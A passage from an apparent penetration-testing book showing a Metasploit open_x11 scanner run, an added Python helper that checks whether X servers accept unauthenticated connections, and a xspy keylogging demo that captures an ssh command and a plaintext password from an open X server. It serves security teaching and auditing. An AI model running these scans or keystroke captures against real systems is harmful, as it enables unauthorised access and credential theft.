Vulnerability Scanning

of archaic boxes out there are still running old, unpatched, and forgotten operating systems. As you've seen in the preceding two examples, legacy systems are often the most vulnerable systems on a network.

To run the open_x11 scanner, simply configure it as you would most other auxiliary modules by setting the RHOSTS and, optionally, the THREADS values. A session is shown next. Notice at IP address 192.168.1.23 that the scanner has found an open X server. This is a serious vulnerability because it allows an attacker to gain unauthenticated access to the system: the X system handles the GUI, including the mouse and keyboard.

msf > use auxiliary/scanner/x11/open_x11
msf auxiliary(open_x11) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    6000             yes       The target port
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(open_x11) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(open_x11) > set THREADS 50
THREADS => 50
msf auxiliary(open_x11) > run
[*] Trying 192.168.1.1
[*] Trying 192.168.1.0
[*] Trying 192.168.1.2...
[*] Trying 192.168.1.29
[*] Trying 192.168.1.30
[*] Open X Server @ 192.168.1.23 (The XFree86 Project, Inc)
[*] Trying 192.168.1.31
[*] Trying 192.168.1.32

. . . SNIP . . .

[*] Trying 192.168.1.253
[*] Trying 192.168.1.254
[*] Trying 192.168.1.255
[*] Auxiliary module execution completed
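What the scanner actually tests is the X11 connection-setup exchange: it sends a setup request carrying no authorization data and looks at the first byte of the reply (0 Failed, 1 Success, 2 Authenticate); the vendor string printed in the "Open X Server" line comes from the Success reply. The following is an added example, not code from the book or from the Metasploit module, written as an audit helper for confirming that X servers you administer refuse such a request. The host, display and timeout parameters are assumptions, and the two sample replies are constructed rather than captured.

```python
import socket
import struct

X11_TCP_BASE = 6000  # display :N listens on TCP 6000 + N

def build_setup_request() -> bytes:
    """Connection setup request with an empty authorization block, little-endian ('l')."""
    # byte-order, pad, major=11, minor=0, auth-name len=0, auth-data len=0, pad
    return struct.pack("<BxHHHHxx", ord("l"), 11, 0, 0, 0)

def parse_setup_reply(reply: bytes) -> dict:
    """Classify the setup reply: first byte is 0 Failed, 1 Success, 2 Authenticate."""
    if not reply:
        return {"status": "no-reply"}
    code = reply[0]
    if code == 0:  # Failed: reason length at byte 1, reason text starts at offset 8
        n = reply[1]
        return {"status": "refused", "reason": reply[8:8 + n].decode("latin-1", "replace")}
    if code == 2:  # Authenticate: the server wants a further authentication exchange
        return {"status": "auth-required"}
    if code == 1:  # Success with no credentials: the finding the scanner reports as open
        # vendor string length sits at offset 24; the string itself starts at offset 40
        (vendor_len,) = struct.unpack_from("<H", reply, 24)
        vendor = reply[40:40 + vendor_len].decode("latin-1", "replace")
        return {"status": "open", "vendor": vendor}
    return {"status": "unknown", "code": code}

def probe_display(host: str, display: int = 0, timeout: float = 3.0) -> dict:
    """Connect to host:display, send the no-auth setup request, classify the answer."""
    with socket.create_connection((host, X11_TCP_BASE + display), timeout=timeout) as sock:
        sock.settimeout(timeout)
        sock.sendall(build_setup_request())
        try:
            reply = sock.recv(4096)
        except socket.timeout:
            reply = b""
    return parse_setup_reply(reply)

# Constructed sample replies (not captured from a real server) for offline checks.
VENDOR = b"The XFree86 Project, Inc"
SAMPLE_OPEN = (struct.pack("<BxHHH", 1, 11, 0, 8 + len(VENDOR) // 4) + bytes(16)
               + struct.pack("<HHBBBBBBBB4x", len(VENDOR), 0xFFFF, 1, 0, 0, 0, 32, 32, 8, 255)
               + VENDOR)
REASON = b"No protocol specified"
SAMPLE_REFUSED = (struct.pack("<BBHHH", 0, len(REASON), 11, 0, (len(REASON) + 3) // 4)
                  + REASON + bytes(3))

if __name__ == "__main__":
    for name, sample in (("open", SAMPLE_OPEN), ("refused", SAMPLE_REFUSED)):
        print(name, parse_setup_reply(sample))
```

A server with access control enabled answers a request like this with a Failed reply, which is the result to expect after hardening a host that the scanner previously listed as open.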

To see what an attacker could do with a vulnerability like this, start keystroke logging using Back|Track's xspy tool, like so:

root@bt:/# cd /pentest/sniffers/xspy/
root@bt:/pentest/sniffers/xspy# ./xspy -display 192.168.1.23:0 -delay 100
ssh root@192.168.1.11(+BackSpace)37
sup3rs3cr3tp4s5w0rd
ifconfig
exit